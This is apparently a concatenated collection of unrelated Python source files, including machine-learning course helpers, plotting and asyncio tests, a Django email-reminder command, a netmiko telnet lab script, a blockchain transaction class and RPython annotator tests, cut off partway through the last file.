base_rdock_score = conf.get('base_rdock_score', -20)
model_name = conf.get('model_name', 'model')
print('========== display configuration ==========')
print('trial num is: ', trial)
print('c_val: ', c_val)
print('loop_num_nodeExpansion: ', loop_num_nodeExpansion)
print('target: ', target)
print('target_dir: ',target_dir)
print('max run time: ',hours)
print('score_type: ', score_type)
print('docking_num: ',docking_num)
print('sa_threshold: ',sa_threshold)
print('model_name: ', model_name)
print('base_rdock_score: ', base_rdock_score)
print('simulation_num: ',simulation_num)
print('hashimoto_filter: ', hashimoto_filter)
"""----------------------------------------------------------------------"""
output_dir = 'result_'+target+'_C'+str(c_val)+'_trial'+str(trial)+'.txt'
smile_old=zinc_data_with_bracket_original(SBMolGen_PATH + '/data/250k_rndm_zinc_drugs_clean.smi')
val,smile=zinc_processed_with_bracket(smile_old)
print('val is ', val)
out_f = open(output_dir, 'w')
out_f.write('#valid_smile, rdock_score, min_score, depth, used_time')
out_f.write('\n')
out_f.close()
model=loaded_model(SBMolGen_PATH + '/RNN-model/'+ model_name) #WM300 not tested
valid_compound=UCTchemical()
|
66401
|
import sys
import numpy as np
from matplotlib import pyplot
from matplotlib.animation import FuncAnimation
import matplotlib as mpl
sys.path.append('..')
from submission import SubmissionBase
def displayData(X, example_width=None, figsize=(10, 10)):
"""
Displays 2D data in a nice grid.
Parameters
----------
X : array_like
The input data of size (m x n) where m is the number of examples and n is the number of
features.
example_width : int, optional
        The width of each 2-D image in pixels. If not provided, the image is assumed to be square,
and the width is the floor of the square root of total number of pixels.
figsize : tuple, optional
A 2-element tuple indicating the width and height of figure in inches.
"""
# Compute rows, cols
if X.ndim == 2:
m, n = X.shape
elif X.ndim == 1:
n = X.size
m = 1
X = X[None] # Promote to a 2 dimensional array
else:
raise IndexError('Input X should be 1 or 2 dimensional.')
example_width = example_width or int(np.round(np.sqrt(n)))
example_height = int(n / example_width)
# Compute number of items to display
display_rows = int(np.floor(np.sqrt(m)))
display_cols = int(np.ceil(m / display_rows))
fig, ax_array = pyplot.subplots(display_rows, display_cols, figsize=figsize)
fig.subplots_adjust(wspace=0.025, hspace=0.025)
ax_array = [ax_array] if m == 1 else ax_array.ravel()
for i, ax in enumerate(ax_array):
ax.imshow(X[i].reshape(example_height, example_width, order='F'), cmap='gray')
ax.axis('off')
def featureNormalize(X):
"""
    Normalizes the features in X. Returns a normalized version of X where the mean value of
    each feature is 0 and the standard deviation is 1. This is often a good preprocessing
    step when working with learning algorithms.
Parameters
----------
X : array_like
        A dataset, an (m x n) matrix, where m is the number of examples,
and n is the number of dimensions for each example.
Returns
-------
X_norm : array_like
The normalized input dataset.
mu : array_like
A vector of size n corresponding to the mean for each dimension across all examples.
sigma : array_like
A vector of size n corresponding to the standard deviations for each dimension across
all examples.
"""
mu = np.mean(X, axis=0)
X_norm = X - mu
sigma = np.std(X_norm, axis=0, ddof=1)
X_norm /= sigma
return X_norm, mu, sigma
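# Minimal usage sketch (hypothetical data): each column of the result has
# mean 0 and sample standard deviation 1, since ddof=1 is used above.
#   X_norm, mu, sigma = featureNormalize(np.array([[1.0, 2.0], [3.0, 4.0]]))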
def plotProgresskMeans(i, X, centroid_history, idx_history):
"""
A helper function that displays the progress of k-Means as it is running. It is intended for use
only with 2D data. It plots data points with colors assigned to each centroid. With the
previous centroids, it also plots a line between the previous locations and current locations
of the centroids.
Parameters
----------
i : int
Current iteration number of k-means. Used for matplotlib animation function.
X : array_like
The dataset, which is a matrix (m x n). Note since the plot only supports 2D data, n should
be equal to 2.
centroid_history : list
A list of computed centroids for all iteration.
idx_history : list
A list of computed assigned indices for all iterations.
"""
K = centroid_history[0].shape[0]
pyplot.gcf().clf()
cmap = pyplot.cm.rainbow
norm = mpl.colors.Normalize(vmin=0, vmax=2)
for k in range(K):
current = np.stack([c[k, :] for c in centroid_history[:i+1]], axis=0)
pyplot.plot(current[:, 0], current[:, 1],
'-Xk',
mec='k',
lw=2,
ms=10,
mfc=cmap(norm(k)),
mew=2)
pyplot.scatter(X[:, 0], X[:, 1],
c=idx_history[i],
cmap=cmap,
marker='o',
s=8**2,
linewidths=1,)
pyplot.grid(False)
pyplot.title('Iteration number %d' % (i+1))
def runkMeans(X, centroids, findClosestCentroids, computeCentroids,
max_iters=10, plot_progress=False):
"""
Runs the K-means algorithm.
Parameters
----------
X : array_like
The data set of size (m, n). Each row of X is a single example of n dimensions. The
data set is a total of m examples.
centroids : array_like
Initial centroid location for each clusters. This is a matrix of size (K, n). K is the total
number of clusters and n is the dimensions of each data point.
findClosestCentroids : func
A function (implemented by student) reference which computes the cluster assignment for
each example.
computeCentroids : func
A function(implemented by student) reference which computes the centroid of each cluster.
max_iters : int, optional
        Specifies the total number of iterations of K-Means to execute.
plot_progress : bool, optional
A flag that indicates if the function should also plot its progress as the learning happens.
This is set to false by default.
Returns
-------
centroids : array_like
A (K x n) matrix of the computed (updated) centroids.
idx : array_like
A vector of size (m,) for cluster assignment for each example in the dataset. Each entry
in idx is within the range [0 ... K-1].
anim : FuncAnimation, optional
A matplotlib animation object which can be used to embed a video within the jupyter
notebook. This is only returned if `plot_progress` is `True`.
"""
K = centroids.shape[0]
idx = None
idx_history = []
centroid_history = []
for i in range(max_iters):
idx = findClosestCentroids(X, centroids)
if plot_progress:
idx_history.append(idx)
centroid_history.append(centroids)
centroids = computeCentroids(X, idx, K)
if plot_progress:
fig = pyplot.figure()
anim = FuncAnimation(fig, plotProgresskMeans,
frames=max_iters,
interval=500,
repeat_delay=2,
fargs=(X, centroid_history, idx_history))
return centroids, idx, anim
return centroids, idx
class Grader(SubmissionBase):
# Random Test Cases
X = np.sin(np.arange(1, 166)).reshape(15, 11, order='F')
Z = np.cos(np.arange(1, 122)).reshape(11, 11, order='F')
C = Z[:5, :]
idx = np.arange(1, 16) % 3
def __init__(self):
part_names = ['Find Closest Centroids (k-Means)',
'Compute Centroid Means (k-Means)',
'PCA',
'Project Data (PCA)',
'Recover Data (PCA)']
super().__init__('k-means-clustering-and-pca', part_names)
def __iter__(self):
for part_id in range(1, 6):
try:
func = self.functions[part_id]
# Each part has different expected arguments/different function
if part_id == 1:
res = 1 + func(self.X, self.C)
elif part_id == 2:
res = func(self.X, self.idx, 3)
elif part_id == 3:
U, S = func(self.X)
res = np.hstack([U.ravel('F'), np.diag(S).ravel('F')]).tolist()
elif part_id == 4:
res = func(self.X, self.Z, 5)
elif part_id == 5:
res = func(self.X[:, :5], self.Z, 5)
else:
raise KeyError
yield part_id, res
except KeyError:
yield part_id, 0
|
66460
|
C = "C"
CPP = "Cpp"
CSHARP = "CSharp"
GO = "Go"
JAVA = "Java"
JAVASCRIPT = "JavaScript"
OBJC = "ObjC"
PYTHON = "Python" # synonym for PYTHON3
PYTHON2 = "Python2"
PYTHON3 = "Python3"
RUST = "Rust"
SWIFT = "Swift"
def supported():
"""Returns the supported languages.
Returns:
the list of supported languages.
"""
return [C, CPP, GO, JAVA, OBJC, PYTHON, PYTHON2, PYTHON3]
|
66469
|
from fjord.base.plugin_utils import load_providers
from fjord.redirector import _REDIRECTORS
class RedirectorTestMixin(object):
"""Mixin that loads Redirectors specified with ``redirectors`` attribute"""
redirectors = []
def setUp(self):
_REDIRECTORS[:] = load_providers(self.redirectors)
super(RedirectorTestMixin, self).setUp()
def tearDown(self):
_REDIRECTORS[:] = []
super(RedirectorTestMixin, self).tearDown()
|
66481
|
import ui, console
import os
import math
def save_action(sender):
with open('image_file.png', 'wb') as fp:
fp.write(img.to_png())
console.hud_alert('image saved in the file image_file.png')
def showimage_action(sender):
img.show()
def create_image():
img = None
with ui.ImageContext(500, 500) as ctx:
path = ui.Path.oval(50,50,400, 100)
ui.set_color((1.0, 0.4, 0.4, 1.0))
path.fill()
path.line_width = 10.0
ui.set_color((0.8, 1.0, 0.5, 1.0))
path.stroke()
ui.draw_string('Label', rect=(50,175,400,100),
                   font=('Georgia', 20),
color=(0.4, 0.6, 1.0, 1.0), alignment=0,
line_break_mode=4)
ui.Image("Dog_Face").draw(50,200,300,300)
img = ctx.get_image()
return img
img = create_image()
#img.show()
main_view = ui.View(frame=(0,0,500,500))
imgview = ui.ImageView(frame=(0,0,500,500))
imgview.image = img
main_view.add_subview(imgview)
save_button = ui.ButtonItem()
save_button.title = 'Save'
save_button.action = save_action
show_button = ui.ButtonItem()
show_button.title = 'Show'
show_button.action = showimage_action
main_view.right_button_items = [save_button, show_button]
main_view.present('sheet')
|
66566
|
import os
import time
from getpass import getpass
from netmiko import ConnectHandler
def read_device(net_connect, sleep=1):
"""Sleep and read channel."""
time.sleep(sleep)
output = net_connect.read_channel()
print(output)
return output
if __name__ == "__main__":
# Code so automated tests will run properly
password = (
os.getenv("NETMIKO_PASSWORD") if os.getenv("NETMIKO_PASSWORD") else getpass()
)
my_device = {
"device_type": "cisco_ios",
"host": "cisco3.lasthop.io",
"username": "pyclass",
"password": password,
"session_log": "output.txt",
}
with ConnectHandler(**my_device) as net_connect:
print()
print(net_connect.find_prompt())
cmd = "telnet 10.220.88.22\n"
net_connect.write_channel(cmd)
output = read_device(net_connect, sleep=1)
if "sername" in output:
net_connect.write_channel(my_device["username"] + "\n")
output = read_device(net_connect, sleep=1)
if "ssword" in output:
net_connect.write_channel(password + "\n")
read_device(net_connect, sleep=1)
net_connect.write_channel("exit\n")
read_device(net_connect, sleep=1)
print()
|
66568
|
import logging
import requests
from tenacity import before_log, retry, stop_after_attempt
class MarketDataClient(object):
logger = logging.getLogger(__name__)
base_url = 'http://market-data:8000'
def _make_request(self, url):
response = requests.get(
f"{self.base_url}/{url}", headers={'content-type': 'application/json'})
return response.json()
@retry(stop=stop_after_attempt(3),
before=before_log(logger, logging.DEBUG))
def all_prices(self):
return self._make_request("prices")
def price(self, code):
return self._make_request(f"prices/{code}")
|
66572
|
import io
import json

# Build a hunalign batch file: one tab-separated line per (source file,
# candidate match, aligned output) triple taken from data_out.json.
with io.open('../hunalign_batch_apsnypress.txt', 'w+', encoding="utf-8") as save_apsnypress:
    with open('../data_out.json', 'r') as f:
        data_j = json.load(f)
    for item in data_j:
        if len(item["possible match"]) != 0:
            for possible_item in item["possible match"]:
                save_apsnypress.write(
                    './ab/' + item["name"] + '.txt' + '\t' +
                    './ru/' + possible_item + '.txt' + '\t' +
                    './aligned/' + item["name"] + '_' + possible_item + '.txt' + '\n')
|
66576
|
from unittest import SkipTest
from holoviews.core import NdOverlay
from holoviews.core.util import pd
from holoviews.element import Segments
from .test_plot import TestBokehPlot, bokeh_renderer
try:
    from bokeh.models import FactorRange
except ImportError:
    pass
class TestSegmentPlot(TestBokehPlot):
def test_segments_color_selection_nonselection(self):
opts = dict(color='green', selection_color='red', nonselection_color='blue')
segments = Segments([(i, i*2, i*3, i*4, i*5, chr(65+i)) for i in range(10)],
vdims=['a', 'b']).opts(**opts)
plot = bokeh_renderer.get_plot(segments)
glyph_renderer = plot.handles['glyph_renderer']
self.assertEqual(glyph_renderer.glyph.line_color, 'green')
self.assertEqual(glyph_renderer.selection_glyph.line_color, 'red')
self.assertEqual(glyph_renderer.nonselection_glyph.line_color, 'blue')
def test_segments_alpha_selection_nonselection(self):
opts = dict(alpha=0.8, selection_alpha=1.0, nonselection_alpha=0.2)
segments = Segments([(i, i*2, i*3, i*4, i*5, chr(65+i)) for i in range(10)],
vdims=['a', 'b']).opts(**opts)
plot = bokeh_renderer.get_plot(segments)
glyph_renderer = plot.handles['glyph_renderer']
self.assertEqual(glyph_renderer.glyph.line_alpha, 0.8)
self.assertEqual(glyph_renderer.selection_glyph.line_alpha, 1)
self.assertEqual(glyph_renderer.nonselection_glyph.line_alpha, 0.2)
def test_segments_overlay_hover(self):
obj = NdOverlay({
i: Segments((range(31), range(31),range(1, 32), range(31)))
for i in range(5)
}, kdims=['Test']).opts({'Segments': {'tools': ['hover']}})
tooltips = [
('Test', '@{Test}'),
('x0', '@{x0}'),
('y0', '@{y0}'),
('x1', '@{x1}'),
('y1', '@{y1}')
]
self._test_hover_info(obj, tooltips)
def test_segments_overlay_datetime_hover(self):
if pd is None:
raise SkipTest("Test requires pandas")
obj = NdOverlay({
i: Segments((
list(pd.date_range('2016-01-01', '2016-01-31')),
range(31),
pd.date_range('2016-01-02', '2016-02-01'),
range(31)
))
for i in range(5)
}, kdims=['Test']).opts({'Segments': {'tools': ['hover']}})
tooltips = [
('Test', '@{Test}'),
('x0', '@{x0}{%F %T}'),
('y0', '@{y0}'),
('x1', '@{x1}{%F %T}'),
('y1', '@{y1}')
]
formatters = {'@{x0}': "datetime", '@{x1}': "datetime"}
self._test_hover_info(obj, tooltips, formatters=formatters)
def test_segments_categorical_xaxis(self):
segments = Segments((['A', 'B', 'C'], [1, 2, 3], ['A', 'B', 'C'], [4, 5, 6]))
plot = bokeh_renderer.get_plot(segments)
x_range = plot.handles['x_range']
self.assertIsInstance(x_range, FactorRange)
self.assertEqual(x_range.factors, ['A', 'B', 'C'])
def test_segments_categorical_yaxis(self):
segments = Segments(([1, 2, 3], ['A', 'B', 'C'], [4, 5, 6], ['A', 'B', 'C']))
plot = bokeh_renderer.get_plot(segments)
y_range = plot.handles['y_range']
self.assertIsInstance(y_range, FactorRange)
self.assertEqual(y_range.factors, ['A', 'B', 'C'])
    def test_segments_categorical_yaxis_invert_axes(self):
        segments = Segments(([1, 2, 3], ['A', 'B', 'C'], [4, 5, 6], ['A', 'B', 'C'])).opts(invert_axes=True)
        plot = bokeh_renderer.get_plot(segments)
        x_range = plot.handles['x_range']
        self.assertIsInstance(x_range, FactorRange)
        self.assertEqual(x_range.factors, ['A', 'B', 'C'])
def test_segments_overlay_categorical_yaxis(self):
segments = Segments(([1, 2, 3], ['A', 'B', 'C'], [4, 5, 6], ['A', 'B', 'C']))
segments2 = Segments(([1, 2, 3], ['B', 'C', 'D'], [4, 5, 6], ['B', 'C', 'D']))
plot = bokeh_renderer.get_plot(segments*segments2)
y_range = plot.handles['y_range']
self.assertIsInstance(y_range, FactorRange)
self.assertEqual(y_range.factors, ['A', 'B', 'C', 'D'])
def test_segments_overlay_categorical_yaxis_invert_axis(self):
segments = Segments(([1, 2, 3], ['A', 'B', 'C'], [4, 5, 6], ['A', 'B', 'C'])).opts(invert_yaxis=True)
segments2 = Segments(([1, 2, 3], ['B', 'C', 'D'], [4, 5, 6], ['B', 'C', 'D']))
plot = bokeh_renderer.get_plot(segments*segments2)
y_range = plot.handles['y_range']
self.assertIsInstance(y_range, FactorRange)
self.assertEqual(y_range.factors, ['A', 'B', 'C', 'D'][::-1])
def test_segments_overlay_categorical_yaxis_invert_axes(self):
segments = Segments(([1, 2, 3], ['A', 'B', 'C'], [4, 5, 6], ['A', 'B', 'C'])).opts(invert_axes=True)
segments2 = Segments(([1, 2, 3], ['B', 'C', 'D'], [4, 5, 6], ['B', 'C', 'D']))
plot = bokeh_renderer.get_plot(segments*segments2)
x_range = plot.handles['x_range']
self.assertIsInstance(x_range, FactorRange)
self.assertEqual(x_range.factors, ['A', 'B', 'C', 'D'])
|
66584
|
from dataclasses import dataclass
@dataclass
class Division:
id: int = None
name: str = None
link: str = None
|
66591
|
from django.core.management.base import BaseCommand, CommandError
from django.urls import reverse
from django.core.mail import send_mail
from django.template.loader import get_template, render_to_string
from django.conf import settings
from django.contrib.sites.models import Site
from accounts.models import Account, EmailConfirmation, EmailRecord
import time
import urllib
import datetime
class Command(BaseCommand):
help = "Sends confirmation emails to accounts that haven't been confirmed yet"
def add_arguments(self, parser):
parser.add_argument('-d','--days-since-last', dest='days', type=int, default=None)
def handle(self, *args, **options):
site = Site.objects.get(id=1)
accounts = Account.objects.filter(is_email_confirmed=False)
for account in accounts:
            if not account.user.email:
                continue  # Skip accounts without an email
confirmation_request = EmailConfirmation.objects.filter(user=account.user)
            if options.get('days'):
discard_before = datetime.datetime.now(tz=datetime.timezone.utc) - datetime.timedelta(days=options.get('days'))
for request in confirmation_request.filter(expires__lte=discard_before):
request.delete()
            if confirmation_request.count() > 0:
                print("Confirmation request pending for %s <%s>" % (account.user.username, account.user.email))
                continue
print("Sending confirmation email to %s <%s>" % (account.user.username, account.user.email))
confirmation_request = account.new_confirmation_request()
confirmation_url = "https://%s%s" % (site.domain, reverse('confirm-email', kwargs={'confirmation_key':confirmation_request.key}))
context = {
'confirmation': confirmation_request,
'confirmation_url': confirmation_url,
}
email_subject = 'Email confirmation reminder'
email_body_text = render_to_string('get_together/emails/users/confirm_email.txt', context)
email_body_html = render_to_string('get_together/emails/users/confirm_email.html', context)
email_recipients = [account.user.email]
email_from = getattr(settings, 'DEFAULT_FROM_EMAIL', '<EMAIL>')
success = send_mail(
subject=email_subject,
message=email_body_text,
from_email=email_from,
recipient_list=email_recipients,
html_message=email_body_html
)
EmailRecord.objects.create(
sender=None,
recipient=account.user,
email=account.user.email,
subject=email_subject,
body=email_body_text,
ok=success
)
time.sleep(0.1)
|
66612
|
import json
import os
import time
import numpy as np
from metalearn import Metafeatures
from tests.config import CORRECTNESS_SEED, METAFEATURES_DIR, METADATA_PATH
from .dataset import read_dataset
def get_dataset_metafeatures_path(dataset_filename):
dataset_name = dataset_filename.rsplit(".", 1)[0]
return os.path.join(METAFEATURES_DIR, dataset_name+"_mf.json")
def is_close(computed_value, known_value):
if type(known_value) is str:
correct = known_value == computed_value
else:
correct = np.array(np.isclose(known_value, computed_value, equal_nan=True)).all()
return correct
def compute_dataset_metafeatures():
metadata = json.load(open(METADATA_PATH, "r"))
for dataset_metadata in metadata:
dataset_filename = dataset_metadata["filename"]
choice = None
while not choice in ["y", "v", "n"]:
choice = input(dataset_filename + " [(y)es, (v)erbose, (n)o]: ")
if choice == "n":
continue
X, Y, column_types = read_dataset(dataset_metadata)
start_time = time.time()
computed_mfs = Metafeatures().compute(X=X, Y=Y, column_types=column_types, seed=CORRECTNESS_SEED)
run_time = time.time() - start_time
if choice == "v":
known_mf_path = get_dataset_metafeatures_path(dataset_filename)
with open(known_mf_path, 'r') as fp:
known_mfs = json.load(fp)
new_mfs = {}
deleted_mfs = {}
updated_mfs = {}
same_mfs = {}
all_mf_names = set(list(computed_mfs.keys()) + list(known_mfs.keys()))
for mf in all_mf_names:
if mf not in known_mfs.keys():
new_mfs[mf] = computed_mfs[mf]
elif mf not in computed_mfs.keys():
deleted_mfs[mf] = known_mfs[mf]
elif is_close(computed_mfs[mf]['value'], known_mfs[mf]['value']):
same_mfs[mf] = computed_mfs[mf]
else:
updated_mfs[mf] = {'known': known_mfs[mf], 'computed': computed_mfs[mf]}
print('UNCHANGED METAFEATURES')
print(json.dumps(same_mfs, sort_keys=True, indent=4))
print('DELETED METAFEATURES')
print(json.dumps(deleted_mfs, sort_keys=True, indent=4))
print('NEW METAFEATURES')
print(json.dumps(new_mfs, sort_keys=True, indent=4))
print('UPDATED METAFEATURES')
print(json.dumps(updated_mfs, sort_keys=True, indent=4))
print("Runtime: " + str(run_time))
choice = None
while not choice in ["y", "n"]:
choice = input(f"Update {dataset_filename} metafeatures? [(y)es, (n)o]: ")
if choice == "y":
mf_file_path = get_dataset_metafeatures_path(dataset_filename)
with open(mf_file_path, 'w') as fp:
json.dump(computed_mfs, fp, sort_keys=True, indent=4)
|
66656
|
import rlp
from rlp.sedes import CountableList, text # big_endian_int
from kademlia.utils import digest
from utils import get_sender
import json
import logging
from exceptions import InvalidTransaction
import Globals
logging.basicConfig(level=logging.DEBUG)
log = logging.getLogger(__name__)
tx_fields = ('sender_pk', 'nonce', 'data', 'timestamp', 'signatures', 'validators')
class FitchainTx(rlp.Serializable):
fields = [
('model_id', text),
('accuracy', text),
('error', text),
('roc', text),
('auc', text),
]
class Transaction(rlp.Serializable):
fields = [
('sender_pk', text),
('nonce', text),
('data', text),
('timestamp', text),
('signatures', CountableList(text)),
('validators', CountableList(text)),
]
def serialize(self):
return 'sender_pk:' + self.sender_pk + ' nonce:' + self.nonce
def __load_data__(self):
""" Load body of this transaction to generate digest """
data = self.sender_pk + self.nonce + self.data + self.timestamp + self.get_validators()
return data
@property
def body(self):
return self.__load_data__()
@property
def hash(self):
""" Return the digest of the unsigned transaction """
return digest(self.__load_data__())
def get_validators(self)->str:
"""
Serialize and stringify list of validators for this transaction
Return list of validators as a string
"""
v_str = []
for v in self.validators:
if isinstance(v, str):
v_str.append(v)
else:
v_str.append(v.decode())
return ''.join(v_str)
@property
def sender(self):
return self.sender_pk
@property
def signers(self):
data = self.__load_data__()
signers = []
for s in self.signatures:
signer = get_sender(s, data)
signers.append(signer)
return signers
def is_superior(self, transaction):
"""
Return true if new transaction has more signatures
than old transaction
"""
return len(self.signatures) > len(transaction['signatures'])
def build_transaction(raw_data: list)->Transaction:
sender_pk = raw_data[0].decode()
nonce = raw_data[1].decode()
data = raw_data[2].decode()
timestamp = raw_data[3].decode()
signatures = [s.decode() for s in raw_data[4]]
validators = [v.decode() for v in raw_data[5]]
return Transaction(sender_pk, nonce, data, timestamp, signatures, validators)
def decode_value(value: bytes, fields=['sender', 'nonce', 'data', 'timestamp'])->dict:
""" Extract fields from byte-stored chunks """
ev = json.loads(value)
body = ''.join([ev[f] for f in fields])
es = ev['signatures'] # existing signatures
return {'body': body, 'signatures': es}
def encode_value(data: dict, sender: str, nonce: str, timestamp: str, signatures: dict):
tx = {}
data_str = json.dumps(data)
tx['data'] = data_str
tx['sender'] = sender
tx['nonce'] = nonce
tx['timestamp'] = timestamp
tx['signatures'] = json.dumps(signatures)
body = sender + nonce + data_str + timestamp
tx['hash'] = digest(body).hex()
return tx
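# encode_value() and decode_value() agree on the signed body: both
# concatenate sender + nonce + data + timestamp, and the 'hash' stored by
# encode_value() is digest() of exactly that concatenation.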
class FitchainTransaction:
def __init__(self, tx: dict):
self.tx = tx
self.valid = False
self.valid_tx_fields = ['data', 'signatures', 'nonce', 'timestamp', 'sender', 'hash']
self.valid_data_fields = ['model_id', 'accuracy', 'error', 'eot']
# check validity and fill fields
self._is_valid()
def _is_valid(self):
""" Process transactions for the fitchain gossiper game """
log.debug("Checking transaction validity")
for v in self.valid_tx_fields:
if v not in self.tx:
return False
# raise InvalidTransaction
# load signatures of this transaction
sigs = json.loads(self.tx['signatures'])
if not isinstance(sigs, dict):
raise InvalidTransaction
data = json.loads(self.tx['data'])
for v in self.valid_data_fields:
if v not in data:
return False # raise InvalidTransaction
# retrieve text fields
nonce = self.tx['nonce']
sender = self.tx['sender']
timestamp = self.tx['timestamp']
# TODO check that this content is matching
self.body = sender + nonce + self.tx['data'] + timestamp
body_hash = digest(self.body).hex()
if body_hash != self.tx['hash']:
return False #raise InvalidTransaction
# check attached signatures (even if they have been checked already)
for sender in sigs:
pubkey = bytes.fromhex(sender)
sig = bytes.fromhex(sigs[sender])
message = self.body.encode()
verified = Globals.account.verify_sig_msg(message, sig, pubkey)
if not verified:
log.warning('Signature %s from %s is not valid', sig, sender)
return False
# valid transaction
self.valid = True
# return self.valid
def get_signatures(self):
if self.valid:
return json.loads(self.tx['signatures'])
def get_body(self):
if self.valid:
return self.body
|
66705
|
import asyncio
import sys
import unittest
import nest_asyncio
def exception_handler(loop, context):
print('Exception:', context)
class NestTest(unittest.TestCase):
def setUp(self):
self.loop = asyncio.new_event_loop()
nest_asyncio.apply(self.loop)
asyncio.set_event_loop(self.loop)
self.loop.set_debug(True)
self.loop.set_exception_handler(exception_handler)
def tearDown(self):
self.assertIsNone(asyncio._get_running_loop())
self.loop.close()
del self.loop
async def coro(self):
await asyncio.sleep(0.01)
return 42
def test_nesting(self):
async def f1():
result = self.loop.run_until_complete(self.coro())
self.assertEqual(result, await self.coro())
return result
async def f2():
result = self.loop.run_until_complete(f1())
self.assertEqual(result, await f1())
return result
result = self.loop.run_until_complete(f2())
self.assertEqual(result, 42)
def test_ensure_future_with_run_until_complete(self):
async def f():
task = asyncio.ensure_future(self.coro())
return self.loop.run_until_complete(task)
result = self.loop.run_until_complete(f())
self.assertEqual(result, 42)
def test_ensure_future_with_run_until_complete_with_wait(self):
async def f():
task = asyncio.ensure_future(self.coro())
done, pending = self.loop.run_until_complete(
asyncio.wait([task], return_when=asyncio.ALL_COMPLETED))
task = done.pop()
return task.result()
result = self.loop.run_until_complete(f())
self.assertEqual(result, 42)
def test_timeout(self):
async def f1():
await asyncio.sleep(0.1)
async def f2():
asyncio.run(asyncio.wait_for(f1(), 0.01))
with self.assertRaises(asyncio.TimeoutError):
self.loop.run_until_complete(f2())
def test_two_run_until_completes_in_one_outer_loop(self):
async def f1():
self.loop.run_until_complete(asyncio.sleep(0.02))
return 4
async def f2():
self.loop.run_until_complete(asyncio.sleep(0.01))
return 2
result = self.loop.run_until_complete(
asyncio.gather(f1(), f2()))
self.assertEqual(result, [4, 2])
@unittest.skipIf(sys.version_info < (3, 7, 0), 'No contextvars module')
def test_contextvars(self):
from contextvars import ContextVar
var = ContextVar('var')
var.set(0)
async def set_val():
var.set(42)
async def coro():
await set_val()
await asyncio.sleep(0.01)
return var.get()
result = self.loop.run_until_complete(coro())
self.assertEqual(result, 42)
if __name__ == '__main__':
unittest.main()
|
66721
|
import json
import functools
from django.conf import settings
from django.test import Client, TestCase
__all__ = ['JsonTestClient', 'JsonTestMixin', 'JsonTestCase']
class JsonTestClient(Client):
def _json_request(self, method, url, data=None, *args, **kwargs):
method_func = getattr(super(JsonTestClient, self), method)
if method == 'get':
encode = lambda x: x
else:
encode = json.dumps
if data is not None:
resp = method_func(url, encode(data), content_type='application/json', *args, **kwargs)
else:
resp = method_func(url, content_type='application/json', *args, **kwargs)
if resp.get('Content-Type', '').startswith('application/json') and resp.content:
charset = resp.charset if hasattr(resp, 'charset') else settings.DEFAULT_CHARSET
resp.json = json.loads(resp.content.decode(charset))
return resp
def __getattribute__(self, attr):
if attr in ('get', 'post', 'put', 'delete', 'trace', 'head', 'patch', 'options'):
return functools.partial(self._json_request, attr)
else:
return super(JsonTestClient, self).__getattribute__(attr)
class JsonTestMixin(object):
client_class = JsonTestClient
class JsonTestCase(JsonTestMixin, TestCase):
pass
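# Usage sketch: subclass JsonTestCase and the test client will JSON-encode
# request bodies and attach a parsed .json attribute to JSON responses, e.g.
#   resp = self.client.post('/hypothetical/endpoint/', {'a': 1})
#   resp.json  # parsed dict, present when the response is application/json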
|
66729
|
import py
from rpython.rlib.signature import signature, finishsigs, FieldSpec, ClassSpec
from rpython.rlib import types
from rpython.annotator import model
from rpython.rtyper.llannotation import SomePtr
from rpython.annotator.signature import SignatureError
from rpython.translator.translator import TranslationContext, graphof
from rpython.rtyper.lltypesystem import rstr
from rpython.rtyper.annlowlevel import LowLevelAnnotatorPolicy
def annotate_at(f, policy=None):
t = TranslationContext()
t.config.translation.check_str_without_nul = True
a = t.buildannotator(policy=policy)
a.annotate_helper(f, [model.s_ImpossibleValue]*f.__code__.co_argcount, policy=policy)
return a
def sigof(a, f):
# returns [param1, param2, ..., ret]
g = graphof(a.translator, f)
return [a.binding(v) for v in g.startblock.inputargs] + [a.binding(g.getreturnvar())]
def getsig(f, policy=None):
a = annotate_at(f, policy=policy)
return sigof(a, f)
def check_annotator_fails(caller):
exc = py.test.raises(model.AnnotatorError, annotate_at, caller).value
assert caller.__name__ in str(exc)
def test_bookkeeping():
@signature('x', 'y', returns='z')
def f(a, b):
return a + len(b)
f.foo = 'foo'
assert f._signature_ == (('x', 'y'), 'z')
assert f.__name__ == 'f'
assert f.foo == 'foo'
assert f(1, 'hello') == 6
def test_basic():
@signature(types.int(), types.str(), returns=types.char())
def f(a, b):
return b[a]
assert getsig(f) == [model.SomeInteger(), model.SomeString(), model.SomeChar()]
def test_arg_errors():
@signature(types.int(), types.str(), returns=types.int())
def f(a, b):
return a + len(b)
@check_annotator_fails
def ok_for_body(): # would give no error without signature
f(2.0, 'b')
@check_annotator_fails
def bad_for_body(): # would give error inside 'f' body, instead errors at call
f('a', 'b')
def test_return():
@signature(returns=types.str())
def f():
return 'a'
assert getsig(f) == [model.SomeString()]
@signature(types.str(), returns=types.str())
def f(x):
return x
def g():
return f('a')
a = annotate_at(g)
assert sigof(a, f) == [model.SomeString(), model.SomeString()]
def test_return_errors():
@check_annotator_fails
@signature(returns=types.int())
def int_not_char():
return 'a'
@check_annotator_fails
@signature(types.str(), returns=types.int())
def str_to_int(s):
return s
@signature(returns=types.str())
def str_not_None():
return None
@check_annotator_fails
def caller_of_str_not_None():
return str_not_None()
@py.test.mark.xfail
def test_return_errors_xfail():
@check_annotator_fails
@signature(returns=types.str())
def str_not_None():
return None
def test_none():
@signature(returns=types.none())
def f():
pass
assert getsig(f) == [model.s_None]
def test_float():
@signature(types.longfloat(), types.singlefloat(), returns=types.float())
def f(a, b):
return 3.0
assert getsig(f) == [model.SomeLongFloat(), model.SomeSingleFloat(), model.SomeFloat()]
def test_unicode():
@signature(types.unicode(), returns=types.int())
def f(u):
return len(u)
assert getsig(f) == [model.SomeUnicodeString(), model.SomeInteger()]
def test_str0():
@signature(types.unicode0(), returns=types.str0())
def f(u):
return 'str'
assert getsig(f) == [model.SomeUnicodeString(no_nul=True),
model.SomeString(no_nul=True)]
def test_ptr():
policy = LowLevelAnnotatorPolicy()
@signature(types.ptr(rstr.STR), returns=types.none())
def f(buf):
pass
argtype = getsig(f, policy=policy)[0]
assert isinstance(argtype, SomePtr)
assert argtype.ll_ptrtype.TO == rstr.STR
def g():
f(rstr.mallocstr(10))
getsig(g, policy=policy)
def test_list():
@signature(types.list(types.int()), returns=types.int())
def f(a):
return len(a)
argtype = getsig(f)[0]
assert isinstance(argtype, model.SomeList)
item = argtype.listdef.listitem
assert item.s_value == model.SomeInteger()
assert item.resized == True
@check_annotator_fails
def ok_for_body():
f(['a'])
@check_annotator_fails
def bad_for_body():
f('a')
@signature(returns=types.list(types.char()))
def ff():
return ['a']
@check_annotator_fails
def mutate_broader():
ff()[0] = 'abc'
@check_annotator_fails
def mutate_unrelated():
